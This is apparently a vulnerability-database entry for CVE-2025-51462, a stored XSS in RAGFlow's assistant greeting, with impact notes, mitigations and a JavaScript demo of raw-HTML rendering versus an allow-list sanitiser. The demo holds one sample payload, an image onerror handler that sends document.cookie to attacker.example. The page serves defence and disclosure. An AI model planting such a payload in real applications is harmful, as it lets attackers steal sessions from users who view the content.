
CVE-2025-51462: n/a

Medium
Published: Tue Jul 22 2025 (07/22/2025, 00:00:00 UTC)
Source: CVE Database V5

Description

Stored Cross-site Scripting (XSS) vulnerability in api.apps.dialog_app.set_dialog in RAGFlow 0.17.2 allows remote attackers to execute arbitrary JavaScript via crafted input to the assistant greeting field, which is stored unsanitised and rendered using a markdown component with rehype-raw.

AI-Powered Analysis

Last updated: 07/22/2025, 20:51:31 UTC

Technical Analysis

CVE-2025-51462 is a stored Cross-site Scripting (XSS) vulnerability in RAGFlow 0.17.2, located in the api.apps.dialog_app.set_dialog function. The value submitted for the assistant greeting field is stored without sanitisation and later rendered by a markdown component that uses rehype-raw. Markdown renderers normally escape raw HTML embedded in the markdown source; rehype-raw instead parses that HTML into the output tree, so unless a sanitising step runs after it, attacker-supplied markup (for example an element carrying an onerror or onload event-handler attribute) reaches the victim's DOM and its JavaScript runs in the origin of the RAGFlow web application. Because the greeting is persisted server-side, the payload is delivered to every user who opens the affected assistant, not only to the attacker's own session. The CVSS 3.1 base score is 6.1 (medium), with vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N: network-reachable, low attack complexity, no privileges stated, user interaction required (the victim must load the poisoned greeting), a scope change, low confidentiality and integrity impact, and no availability impact. The scope change is the usual XSS reading: the vulnerable component is the server-side API and rendering code, while the impacted component is the victim's browser. No exploitation in the wild has been reported and no patch has been linked to the record at the time of writing. The weakness is CWE-79 (Improper Neutralization of Input During Web Page Generation). Using rehype-raw without a sanitiser is a recurring cause of this class of bug: the plugin's purpose is to let raw HTML through, so on untrusted content it must be followed by an allow-list sanitiser such as rehype-sanitize, or not used at all.

Potential Impact

For organizations running RAGFlow 0.17.2 (or other versions with the same rendering path), this stored XSS lets an attacker who can set an assistant greeting run JavaScript in the browser of anyone who opens that assistant, within the application's origin. Typical consequences are session hijacking (direct cookie theft only if the session cookie lacks the HttpOnly flag; otherwise the script can still issue authenticated requests from the victim's session), actions performed as the victim, exfiltration of chat or document content visible to the victim, and redirection to attacker-controlled pages. Because the payload is stored, no link needs to be sent: any user who views the greeting triggers it, and social engineering can be used to steer an administrator to the poisoned assistant. The scope change in the vector reflects that the vulnerable component (the server-side API and rendering code) and the impacted component (the victim's browser) differ; it does not by itself imply reach into other systems, although a hijacked administrative session can be used to pivot further within the application. European organizations in regulated sectors (finance, healthcare, government) face GDPR exposure if personal data held in chat sessions or knowledge bases is accessed. The absence of known exploitation gives a window to remediate before the technique is weaponised.

Mitigation Recommendations

1. Fix the rendering path, which is the authoritative control: either remove rehype-raw from the markdown component that renders the greeting, or keep it and run an allow-list sanitiser immediately after it (rehype-sanitize placed after rehype-raw in the plugin order is the standard pairing). rehype-raw itself has no sanitisation setting; its job is to let raw HTML through.
2. Add server-side validation of the assistant greeting in set_dialog as defence in depth: strip or reject HTML tags and event-handler attributes before storage. Also re-check greetings already stored, since payloads written before the fix remain in the database and are rendered on every view.
3. Deploy a Content Security Policy whose script-src does not allow 'unsafe-inline' (nonce- or hash-based), so inline event handlers and injected scripts are blocked even if a rendering bug remains; trial it in report-only mode first. Set HttpOnly, Secure and SameSite on session cookies to limit what an injected script can read or replay.
4. Review every other place the application renders user-supplied markdown with rehype-raw (descriptions, prompts, chat messages), since the same pattern may exist elsewhere.
5. Make users and administrators aware that assistant greetings are attacker-controllable content until the fix is in place.
6. Monitor server logs for greetings containing markup and watch for user reports of unexpected browser behaviour, which may indicate exploitation attempts.
7. Since no patch has been linked to the record, consider temporary workarounds: restrict who can create or edit assistants, or disable the greeting feature until a fix is released.
8. Follow vendor advisories and apply the fix promptly once available.
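As an added illustration (not RAGFlow's code and not part of this advisory), the following stand-alone JavaScript models the two rendering paths described in the analysis and in recommendation 1: the vulnerable path, where raw HTML in the stored greeting passes through to the output unchanged (what rehype-raw does in a react-markdown pipeline), and the remediated path, where an allow-list sanitiser runs on the rendered HTML before it reaches the DOM (the role rehype-sanitize plays when listed after rehype-raw). The toy markdown converter, tokenizer, allow-list, sample greetings and the attacker.example host are all constructed for the example; the real plugin wiring appears only in comments.

```javascript
// Added example, not RAGFlow code. Models how a stored assistant greeting is rendered
// (a) through a raw-HTML-passing markdown pipeline, as with react-markdown + rehype-raw and
// no sanitizer, and (b) through the same pipeline with an allow-list sanitizer applied to the
// final HTML, the job rehype-sanitize does when listed after rehype-raw:
//   rehypePlugins: [rehypeRaw]                   // vulnerable: raw HTML reaches the DOM
//   rehypePlugins: [rehypeRaw, rehypeSanitize]   // remediated: sanitize AFTER raw parsing
// Everything below (tokenizer, allow-list, sample greetings, attacker.example host) is
// constructed for the example so it runs in plain Node with no dependencies.

// Constructed greetings: one payload of the kind the CVE describes, one benign greeting.
const ATTACKER_GREETING =
  'Hello! <img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)"> **Welcome**';
const BENIGN_GREETING =
  'Hi, I am your **assistant**. See <a href="https://docs.example.com">docs</a>.';

// Toy markdown: only **bold** is converted. Raw HTML in the source passes through untouched,
// which is the behaviour rehype-raw adds to a real renderer.
function markdownToHtml(md) {
  return md.replace(/\*\*(.+?)\*\*/g, '<strong>$1</strong>');
}

// Vulnerable path: markdown rendered, raw HTML (and its event-handler attributes) kept.
function renderVulnerable(greeting) {
  return markdownToHtml(greeting);
}

// Allow-list of tags a greeting legitimately needs, with the attributes permitted on each.
// A Map (not a plain object) so tag names like "constructor" cannot hit Object.prototype.
// Anything not listed (img, script, iframe, svg, style, every on* handler) is dropped.
const ALLOWED = new Map([
  ['p', new Set()], ['br', new Set()], ['strong', new Set()], ['em', new Set()],
  ['ul', new Set()], ['ol', new Set()], ['li', new Set()],
  ['a', new Set(['href', 'title'])],
]);
// href must be http(s), mailto, or a same-origin path; blocks javascript:, data:, //host.
const SAFE_URL = /^(https?:|mailto:|\/(?!\/))/i;

function escapeText(t) {
  return t.replace(/&/g, '&amp;').replace(/</g, '&lt;')
          .replace(/>/g, '&gt;').replace(/"/g, '&quot;');
}

// Parse the attribute string of one tag into [name, value] pairs (quoted, unquoted or bare).
function parseAttrs(s) {
  const attrs = [];
  const re = /([^\s=\/>]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+)))?/g;
  let m;
  while ((m = re.exec(s)) !== null) {
    attrs.push([m[1].toLowerCase(), m[2] ?? m[3] ?? m[4] ?? '']);
  }
  return attrs;
}

// Allow-list sanitizer over the rendered HTML: unknown tags are removed (their text content is
// kept and escaped), unknown attributes are removed, unsafe href values are removed.
function sanitizeHtml(html) {
  const out = [];
  const tagRe = /<\/?([a-zA-Z][\w-]*)([^>]*)>/g;
  let last = 0;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    out.push(escapeText(html.slice(last, m.index)));
    last = tagRe.lastIndex;
    const closing = m[0][1] === '/';
    const name = m[1].toLowerCase();
    if (!ALLOWED.has(name)) continue;          // drop the whole tag, e.g. <img onerror=...>
    if (closing) { out.push(`</${name}>`); continue; }
    const permitted = ALLOWED.get(name);
    const kept = parseAttrs(m[2])
      .filter(([k, v]) => permitted.has(k) &&
                          !(k === 'href' && !SAFE_URL.test(v.trim())))
      .map(([k, v]) => ` ${k}="${escapeText(v)}"`)
      .join('');
    out.push(`<${name}${kept}>`);
  }
  out.push(escapeText(html.slice(last)));
  return out.join('');
}

// Remediated path: same markdown step, then sanitize the HTML before it reaches the DOM.
function renderSafe(greeting) {
  return sanitizeHtml(markdownToHtml(greeting));
}

console.log('vulnerable:', renderVulnerable(ATTACKER_GREETING));
console.log('remediated:', renderSafe(ATTACKER_GREETING));
console.log('benign    :', renderSafe(BENIGN_GREETING));
```

The ordering is the point: sanitisation has to run on the final HTML tree, after raw HTML has been parsed, because filtering the markdown source before storage can be bypassed by encodings and by markdown constructs that themselves produce attributes. Storing a cleaned greeting is still worthwhile as defence in depth, but the sanitiser at render time is what closes the bug.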


Technical Details

Data Version
5.1
Assigner Short Name
mitre
Date Reserved
2025-06-16T00:00:00.000Z
Cvss Version
3.1
State
PUBLISHED

Threat ID: 687ff645a915ff00f7fa9e6b

Added to database: 7/22/2025, 8:36:21 PM

Last enriched: 7/22/2025, 8:51:31 PM

Last updated: 9/5/2025, 10:06:36 AM
